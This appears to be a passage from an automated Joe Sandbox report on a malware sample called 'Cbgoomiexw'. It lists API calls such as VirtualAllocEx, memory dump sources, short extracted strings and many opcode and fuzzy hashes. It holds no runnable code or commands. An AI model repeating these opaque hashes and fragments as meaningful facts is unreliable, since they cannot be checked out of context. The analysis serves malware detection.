                                          • Instruction Fuzzy Hash: C01147758002499FDB10DFAAC845ADFFFF5EF88320F148419E559A7250CB75A954CFA0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0260931D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 3e39622329c5afa0463549569c0d5057fb00d991b3c0b56d12e7034060b1c651
                                          • Instruction ID: 2fd626d146e507743f8a2191617e976ff2a9b4a707885dd85b4fdf1b84b9b588
                                          • Opcode Fuzzy Hash: 3e39622329c5afa0463549569c0d5057fb00d991b3c0b56d12e7034060b1c651
                                          • Instruction Fuzzy Hash: 3021A9B1805388CEDB21CF65D5043DEBFF0EB0A310F15849AD089A7282C338AA48CF62
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063032DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 9c4e935438c89ec69df4a787457aedf7b3a85f72d857b17a42222bbab8e53ad5
                                          • Instruction ID: 2730e56decd81470a5198405e0185d3a127a5b43f113fc90e8c393970de16a49
                                          • Opcode Fuzzy Hash: 9c4e935438c89ec69df4a787457aedf7b3a85f72d857b17a42222bbab8e53ad5
                                          • Instruction Fuzzy Hash: 6B1156718002098FDB10DFAAC845ADFBBF5EB88320F108419E519A7250CB75A944CFA0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0260931D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 5e35eeaecfda3cd9ffbd4ab05b7e4e1a7c5fc7ccaf0d10a8da6b762c028b9da2
                                          • Instruction ID: dcaab9fa5b907af33465291226d13bbb6756080288b80a28e34fb166ed165e02
                                          • Opcode Fuzzy Hash: 5e35eeaecfda3cd9ffbd4ab05b7e4e1a7c5fc7ccaf0d10a8da6b762c028b9da2
                                          • Instruction Fuzzy Hash: FF11DDB18003888ECB24CF99D1043DFBFF4EB04310F108499D489A3282C338AA48CFA1
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AA06
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 291916097737d6a86de570c41f595d5583f087e62dd54f3ba9b5cb2d46e6dc94
                                          • Instruction ID: de51d0746ca9b9ebd846b33f559e72585e225ecc28a5d685f3f83e40a602b9a3
                                          • Opcode Fuzzy Hash: 291916097737d6a86de570c41f595d5583f087e62dd54f3ba9b5cb2d46e6dc94
                                          • Instruction Fuzzy Hash: 9F110FB5C003498FCB14DF9AC544A9FFBF4EB88324F10841AD529B7240C379A545CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          • Opcode ID: 32c1bb0f3c97a1ca9ebe804c4ee121a4308d3c7ef9e1daa0d99f2d275ffeb786
                                          • Instruction ID: 04ee8c5355ea765fc02d23d7c108c248bf8fc87db3b0ae1f938bc526d4e3409b
                                          • Opcode Fuzzy Hash: 32c1bb0f3c97a1ca9ebe804c4ee121a4308d3c7ef9e1daa0d99f2d275ffeb786
                                          • Instruction Fuzzy Hash: C9510635A0162A8FCB10CF68D4849AAFBB6FF86320B15859AE555DB342D730FC95CBD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pbq
                                          • API String ID: 0-3896149868
                                          • Opcode ID: 23b06f0548074a0edad8bcae4de884ac8a7f03cc944cab28eb372d129424daa6
                                          • Instruction ID: 65450298825ec3abb583327b8ecbcad319a3cb6cffe457e56a2793f0154fb32b
                                          • Opcode Fuzzy Hash: 23b06f0548074a0edad8bcae4de884ac8a7f03cc944cab28eb372d129424daa6
                                          • Instruction Fuzzy Hash: 5B513C76600114EFCB459FA8C904E59BFF6FF8931471684D9E2099F276DA32DC12EB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl^q
                                          • API String ID: 0-2831078282
                                          • Opcode ID: a6344cccd6aeff6b1cd064a4ef3f063334202c8c6dfbdd70d005dae313e3944e
                                          • Instruction ID: 3c8ddadd029ae183e9934c0628024056e21f44e2b12799023adfab50cfd4e2c2
                                          • Opcode Fuzzy Hash: a6344cccd6aeff6b1cd064a4ef3f063334202c8c6dfbdd70d005dae313e3944e
                                          • Instruction Fuzzy Hash: 4A51E274B002198FDB44DF28C894AAA7BE6BF88705F5540A9E905CB3B5DB70EC45CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: d81f28048fce1ac24085382c3244ebb79ae07e4527fe790904b4ad874e110e22
                                          • Instruction ID: b1a4e80bfd4fb071692ffd7141212210f0ef825a99948d1f69663ee7c82aa6d9
                                          • Opcode Fuzzy Hash: d81f28048fce1ac24085382c3244ebb79ae07e4527fe790904b4ad874e110e22
                                          • Instruction Fuzzy Hash: F2319C30D04358DFDB59CFA9D9046EEBBF2EF49311F01846AD512A7291DB345A85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          • Opcode ID: 618160e4ce8c95bff9adc020e63a51c3590c8915f11821159f0aa8628a52c589
                                          • Instruction ID: 71cc1db784a71acfdb07dbdf79d8c17785e8c3c46116ca5f688b352a4abf78a9
                                          • Opcode Fuzzy Hash: 618160e4ce8c95bff9adc020e63a51c3590c8915f11821159f0aa8628a52c589
                                          • Instruction Fuzzy Hash: C721B3313042589FCB51CF2AD844AAA7BEAFF8A311B154092F944CB271D631DC40CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          • Opcode ID: 53d237ba5b71676e6537fe4b2c738b49dd4bdea316849d0b736070808ba43cc7
                                          • Instruction ID: ef60fc2cec8b3f0b3da9b212fe157f124f9aa076702fd049ad1f41c50255d276
                                          • Opcode Fuzzy Hash: 53d237ba5b71676e6537fe4b2c738b49dd4bdea316849d0b736070808ba43cc7
                                          • Instruction Fuzzy Hash: E0219F713002689FCB41CF6AC854AAA7BEAAF89311F0940A6FD44CB361DA35DC50CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: e5f807899c0e4ba001ac2b623b3c1116af9cb3b18595c42f3f3251e28a50956e
                                          • Instruction ID: d85d4f0de88f38885a47437b2740a7b29fad2e2cc05eb809522544e9284ab82e
                                          • Opcode Fuzzy Hash: e5f807899c0e4ba001ac2b623b3c1116af9cb3b18595c42f3f3251e28a50956e
                                          • Instruction Fuzzy Hash: 52214C30D04219DFEB58CFA9D4086FEBBF2EF48311F10846AD526A7240DB345985CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *
                                          • API String ID: 0-163128923
                                          • Opcode ID: 331d9b67cdebca86921662b9566151feb35f8266688b58bc3b56936ace2275fe
                                          • Instruction ID: ec11faa124ae3cbe3bbe6b11624e7b4d678f3050f8ce6519e6f64eb7c4f55427
                                          • Opcode Fuzzy Hash: 331d9b67cdebca86921662b9566151feb35f8266688b58bc3b56936ace2275fe
                                          • Instruction Fuzzy Hash: DF115E30914219CFD7A09F54DC58BD97BB2BF85345F0441E9D12AAB6C6DB341A848F41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !
                                          • API String ID: 0-2657877971
                                          • Opcode ID: 71bb4e84b95c1e42b39bea3ad4f180c5979c3649eebe3cb0d902602285b6bcdd
                                          • Instruction ID: a3379bb5a274a02b9bda38806b4c9674139436650f981d89b5761ac370da2b49
                                          • Opcode Fuzzy Hash: 71bb4e84b95c1e42b39bea3ad4f180c5979c3649eebe3cb0d902602285b6bcdd
                                          • Instruction Fuzzy Hash: E801C471A05218CFEB64DF58DC54BDABBFABB09304F0041D6D618A7284D334AA84CFA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 9fb2cae1b8424b62b70d483c9ca998d6f3e4cddb05f92e3517656b559bb21089
                                          • Instruction ID: 0da82b3be27eca7f729d96ddbfe65aa7097a7e9dc42a6d526caf6391c61d154c
                                          • Opcode Fuzzy Hash: 9fb2cae1b8424b62b70d483c9ca998d6f3e4cddb05f92e3517656b559bb21089
                                          • Instruction Fuzzy Hash: 5DF0A5B4E112288FDB54EFA8D895B9EBBB2FB84300F1051DA9509B7384DB305E85CF64
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86d3f3212ba7f9a1e5e2d60aa5ee8ace6d2ca2e7b29d5fd9efa5300a88584935
                                          • Instruction ID: a32b6b71e9f10d4967ef1e1e3425575a6f6afa30282ee6f2b615d84886771b8e
                                          • Opcode Fuzzy Hash: 86d3f3212ba7f9a1e5e2d60aa5ee8ace6d2ca2e7b29d5fd9efa5300a88584935
                                          • Instruction Fuzzy Hash: D0A18034E0062ACFDF91DFA5D840AEEBBB1BF48300F148116E815A7399D738994ADF91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8050983562ecb8ec31bd4d83142ad99d68d7ce013d39a96bad472fe2bbf330cb
                                          • Instruction ID: 9ff04017d1c36bb533bec378855b2ec857ba5e20a4f7f2968957d8eaaa024bfe
                                          • Opcode Fuzzy Hash: 8050983562ecb8ec31bd4d83142ad99d68d7ce013d39a96bad472fe2bbf330cb
                                          • Instruction Fuzzy Hash: 4981AE35B012248FCB15DFA4E954AADBBF2EF88311F14406AE912EB391CB35DD85CB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d254f6545021105831849745958d2659d851f8c0c47afbbaef1d28e19f93f191
                                          • Instruction ID: b534dfda5c35221d7993bbbe9674fb6d6bcfd335951e16eae5bb508d8311e603
                                          • Opcode Fuzzy Hash: d254f6545021105831849745958d2659d851f8c0c47afbbaef1d28e19f93f191
                                          • Instruction Fuzzy Hash: EE611474E10218DFEB49DFE9D894AEEBBB2FB88341F10402AE516A7395D7305945CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48929af8dd311d1aaa5716d65e5cbaa33df0b053dd558eab40934c2564182bd6
                                          • Instruction ID: e98511687ce06ca8a1f27bd857c9a635e342aab7f120c59b6b0a89a377c46d45
                                          • Opcode Fuzzy Hash: 48929af8dd311d1aaa5716d65e5cbaa33df0b053dd558eab40934c2564182bd6
                                          • Instruction Fuzzy Hash: 57519074E05228CFEBA8CF68DC94BA9B7B1BB89301F0485A9D50DA7355DB706E84CF50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 176a767cb55037f6f76cf7d32e04bdde11c45ed22b20211a000a0b9a9bcbc8ac
                                          • Instruction ID: 41ef5e9c8e80373c21c5062edd2e1de2e5684b34df1601b73dfe3c286654d3c4
                                          • Opcode Fuzzy Hash: 176a767cb55037f6f76cf7d32e04bdde11c45ed22b20211a000a0b9a9bcbc8ac
                                          • Instruction Fuzzy Hash: 1A419070E05228CFEBA8CFA8CC94BADB7B5AB88301F0485A9D50DA7351DB305E848F51
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71f025953a80d7fe4844532dcb1cc9f298c5ec13d0f7837d012bd93b7b2645b1
                                          • Instruction ID: af8e8c0e3eb371abd2c9b5947db54b9dd00130005a15574ccfaf6da89d4f926c
                                          • Opcode Fuzzy Hash: 71f025953a80d7fe4844532dcb1cc9f298c5ec13d0f7837d012bd93b7b2645b1
                                          • Instruction Fuzzy Hash: 2131E636A10104DFDB59DF58D888E99BBB2FF49320B1640B8E9099B372C731ED55DB80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0381013a3a38fecb6b8420ef16843d8c9fe4b2dd8dff9ec4d48bcd05bb3512a0
                                          • Instruction ID: a38a06e1c650d788a174216106aaf1be9b5b32c9ebc88d5073a8d73a82d0fa49
                                          • Opcode Fuzzy Hash: 0381013a3a38fecb6b8420ef16843d8c9fe4b2dd8dff9ec4d48bcd05bb3512a0
                                          • Instruction Fuzzy Hash: 5A41AB34A002258FDB50CFA5C944ABEFBB1FF88345F00842AD50AE7290E734E949CBD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdf749516ead29770e7d793192990a351e06f3ea2d122696244b256dfa249d98
                                          • Instruction ID: 737897ee2a1b8761e2f9a7f95d74d35743bfb494552611a3b6e951d8ddf66e45
                                          • Opcode Fuzzy Hash: fdf749516ead29770e7d793192990a351e06f3ea2d122696244b256dfa249d98
                                          • Instruction Fuzzy Hash: 5A41AF70E05228CFEBA8CF98DC94BEDB7B1BB88301F0485A9D509A7355DB706E848F50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 962d94729462b9f4cbe0f20ee5e22f44dc158c371ed6eefeec46a985ce384194
                                          • Instruction ID: 173737560b10ef63d92daf739a09e97ad6bbb4b66a3ac8a7e510a10a097eba3d
                                          • Opcode Fuzzy Hash: 962d94729462b9f4cbe0f20ee5e22f44dc158c371ed6eefeec46a985ce384194
                                          • Instruction Fuzzy Hash: FD31F274E05218EFEB44CFA9D945AEEBBF6AF8A300F10902AD525BB350D77459448FA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b07ffd99503d2851cd070bcf96ea0ec4f98862122622853334bc3f167be1df46
                                          • Instruction ID: 4dee56cf7c4f763310c5fdee2cc63fe7b613b03e7c16965e2e91af0a3a24df17
                                          • Opcode Fuzzy Hash: b07ffd99503d2851cd070bcf96ea0ec4f98862122622853334bc3f167be1df46
                                          • Instruction Fuzzy Hash: 6A3169B4E04209CFDB44DFAAD4806EEBBF2EB89300F10D06AD405A7348D7309A86CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b9b576e823492e7b3d07eda5239b323d23a04a2810c38c3281d2e7204903709
                                          • Instruction ID: a6e6734485f8a048781b8a07f881139383e40ae1b96e1d37285eca52434aece7
                                          • Opcode Fuzzy Hash: 7b9b576e823492e7b3d07eda5239b323d23a04a2810c38c3281d2e7204903709
                                          • Instruction Fuzzy Hash: 81317634B00214CFC755EF34D858569BBB2EF89311B1048ADE8468B365CB35DD8ACF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed8793f015de9d8e13d6d06fd9fbc701557d1229bf0e3988ee9610ab07da5316
                                          • Instruction ID: bf3c0ff07f11916e2bd5d0cf41fee81a8fc113227a8c6c4d85ea2b70a340f060
                                          • Opcode Fuzzy Hash: ed8793f015de9d8e13d6d06fd9fbc701557d1229bf0e3988ee9610ab07da5316
                                          • Instruction Fuzzy Hash: A4318A30B003148FC765AF35D85492ABBB7FF95311B10486DE9578B369DB36E88ACB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62b13e4ac26953381b1f7fae82cedce941e6e80e2d1e350e550d791bf2851023
                                          • Instruction ID: 2374666992e89555652fb03e6fddba478c8d51031aa3b9d747db761e0a451ea9
                                          • Opcode Fuzzy Hash: 62b13e4ac26953381b1f7fae82cedce941e6e80e2d1e350e550d791bf2851023
                                          • Instruction Fuzzy Hash: FF310570E05229AFDB44CFAAD8456EEBBF6FF89310F009129E414AB250D7745944CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be16e9cc329ac6988da7ad11ee045c0f9e41d176c4022e8d03342872f9b69090
                                          • Instruction ID: c1bc4587c65fcbb98404285cc7db94ab2255e6eef7367028d3b0c75f19e995c7
                                          • Opcode Fuzzy Hash: be16e9cc329ac6988da7ad11ee045c0f9e41d176c4022e8d03342872f9b69090
                                          • Instruction Fuzzy Hash: 1E313774E00208AFCB49DFA9D8916EEBFF2FF88311F10806AE555A7264DB305945CFA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b839413635c578c74ebbe88be8b6c3296244a6438aa83b9568a0f04af46a0b16
                                          • Instruction ID: 136517f1970fb0c74297d6d53bf4a1fe284cae381f91513721e1ea569fca0bf6
                                          • Opcode Fuzzy Hash: b839413635c578c74ebbe88be8b6c3296244a6438aa83b9568a0f04af46a0b16
                                          • Instruction Fuzzy Hash: CE314BB1D05229CFEBA4CF29D854BADBBF2FB48300F2091A9D009E7655DB305984CF88
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76d151c754fb3a7c39a14df778f9a025586413313eb49e432720f510469bae0b
                                          • Instruction ID: 238868945b1de2d980ad0b1f8203791cbab17af5ac2e1dc720fdc9366fd740e5
                                          • Opcode Fuzzy Hash: 76d151c754fb3a7c39a14df778f9a025586413313eb49e432720f510469bae0b
                                          • Instruction Fuzzy Hash: E0311CB4E04209CFEB44DFAAD4846AEBBF6FB88300F10D465D515A7354D7349A85CF94
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48d7287b1e8145f465cddb6790c561cb70050be1ec2cc568aa5379ac3580c0b5
                                          • Instruction ID: 91ca700ae9aa17f8721066334f0e1dddc1843876809f72d8325cc4f8342047a8
                                          • Opcode Fuzzy Hash: 48d7287b1e8145f465cddb6790c561cb70050be1ec2cc568aa5379ac3580c0b5
                                          • Instruction Fuzzy Hash: BC310374E042299FDB44CFAAC9456EEBBF2FF89300F04906AE015AB350E7744944CF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0f13771fcd0d7ad326c20ce7b9977ef5c0d5012278d3b471ceb1ef91152f7eb
                                          • Instruction ID: e90c39c67fd98948af1722ba7f08356c064934b724a1008242d164cdbffa18d7
                                          • Opcode Fuzzy Hash: b0f13771fcd0d7ad326c20ce7b9977ef5c0d5012278d3b471ceb1ef91152f7eb
                                          • Instruction Fuzzy Hash: E32105306002049FC714DB69D80479EBFF6EF84301F004969E04AE7649DF71AA428BE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 412d0278637d458c1bd7ad8f9d883f73bd4c0a6b5ae57e4f0f90bb67d02b30ea
                                          • Instruction ID: 774ad939e1cb3352a1c08f2dbdd7b5f357f23ebcf3620c7900b0f14133afda83
                                          • Opcode Fuzzy Hash: 412d0278637d458c1bd7ad8f9d883f73bd4c0a6b5ae57e4f0f90bb67d02b30ea
                                          • Instruction Fuzzy Hash: 7E21A231F002258F8B508EB9EC804AEB7F6FF84661B104476E52AD7640DB31D946C7A0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d11ad737a58fc8ae0ee2345be86f86af1425c895263239f9b7dcee9214af4b26
                                          • Instruction ID: cd1a51fe530354e8b938d1a3ba4d637c8d7dea27f8a055f779346612b1681dc7
                                          • Opcode Fuzzy Hash: d11ad737a58fc8ae0ee2345be86f86af1425c895263239f9b7dcee9214af4b26
                                          • Instruction Fuzzy Hash: 44219F35A00218DBCB148FA9C844ADE7BF7EF8C320F145529E911A7394DB719985CBA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1879604159.000000000241D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0241D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_241d000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a3ef2f5849be5e6bbfc47985d11f01b354bfb3470d57c4aeb8316668f2fedf4
                                          • Instruction ID: f247bda7d5042567d14ec4fc038b412c40be0151b066cd51878e425f95a7ac2d
                                          • Opcode Fuzzy Hash: 3a3ef2f5849be5e6bbfc47985d11f01b354bfb3470d57c4aeb8316668f2fedf4
                                          • Instruction Fuzzy Hash: 2B21D6B1904240DFDB05DF14D9C4B27BF65FB94328F24C56AE90A0A356C336D456C7A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
